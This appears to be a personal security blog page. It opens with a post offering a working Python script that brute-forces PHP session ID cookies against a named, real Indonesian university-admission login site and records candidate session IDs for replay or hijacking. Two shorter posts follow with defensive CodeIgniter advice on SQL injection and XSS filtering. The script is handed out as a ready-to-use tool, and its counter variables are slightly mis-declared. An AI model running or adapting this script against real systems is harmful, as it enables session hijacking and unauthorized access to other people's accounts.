Script-Kiddey: Session ID Bruteforce with Python

Last year, I got a task to do some penetration testing with ujian.sbmptn.or.id. This site were used for Indonesia’s National Selection for Public University Admission (Seleksi Bersama Masuk Perguruan Tinggi Negeri, SBMPTN) registration. The first thing I did was to determine how this simple site react when we passed a bogus Session ID cookies (As usually I do).

Here I give you a tools to accomplish this. To use this thing, first determine the md5 checksum of normal site when it react with wrong session ID then put inside CHECKSUM variable. And don’t forget to analyse the format of your tested site’s session ID in the first place to determine site’s session ID pattern. In this script, It does with 26 alphanumeric (small case) character.

import httplib
import hashlib
import random
import string
import datetime

# Normal react web page's md5 checksum
CHECKSUM = "f98a1ee2197ee3e880f235236285ff58"

# Site
server = "ujian.sbmptn.or.id"
address = "/login.php"

f_success = open("success_token", "a")
f_fail = open("fail_token", "a")

success = 0
fail = 0

def do_exploit(phpsessid):
    global success, fail_token
    conn = httplib.HTTPConnection(server, timeout=10)
    
    try:
        conn.request("POST", address, "", {"Cookie": "PHPSESSID=" + phpsessid + "; path=/"})
        time = str(datetime.datetime.now())
        resp = conn.getresponse()
        data = resp.read()
        
        # MD5 Checksum
        md5 = hashlib.md5()
        md5.update(data)

        result = md5.hexdigest()
        if (CHECKSUM == result):
            fail = fail + 1
            f_fail.write(time + " " + phpsessid + "\n")
        else:
            success = success + 1
            f_success.write(time + " " + phpsessid + "\n")

    except:
        print "Something happened"

while 1:
    phpsessid = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(26))
    do_exploit(phpsessid)

When you run this script, check a file called “f_success”. If it tells you something, then you may be found a working session ID you can replay/inject to.

CodeIgniter: Two action to prevent SQL Injection

In my previous post, I did explain to you about how to prevent XSS injection for your CodeIgniter Apps. And yet, for those who are novelty in web programming, I tell you the another kind of security hole in web programming which can be fatal because It can exposes your inner side of application’s database, it is SQL Injection.

Read More

CodeIgniter: Apply XSS filter as mandatory

If you are kind of novelty in web programming, and you have no idea what the XSS is, now I tell you what it is : “It is one kind of web application security hole that make use of unsanitized input so the intruder can input some Javascript/HTML in it”. And is it big deal? Yes, of course, because if they can do that, The malicious user input will be interpreted as real Javascript/HTML tag and therefore it will be processed/executed when it is printed.

Thankfully, CodeIgniter as one of PHP Application Framework which still gaining user base has a capability to deal with it. It has a XSS filtering mechanism which could be implemented to sanitized user input from GET/POST/Cookie data. If you want to use that, you just need to open CodeIgniter configuration file /application/config/config.php and edit this line :

$config['global_xss_filtering'] = TRUE;  # It is FALSE by default

And now if some adversary do inputting something like <script>alert(0);</script> inside of one of your application’s input, It will converted to be [removed]alert(0);[removed] so that it won’t be interpreted as a Javascript.

But remember, stick with using $this->input->post("variable") or $this->input->get("variable") when you are dealing with user input. Forget about that thing you learnt in first-time PHP class ($_POST[] or $_GET[]).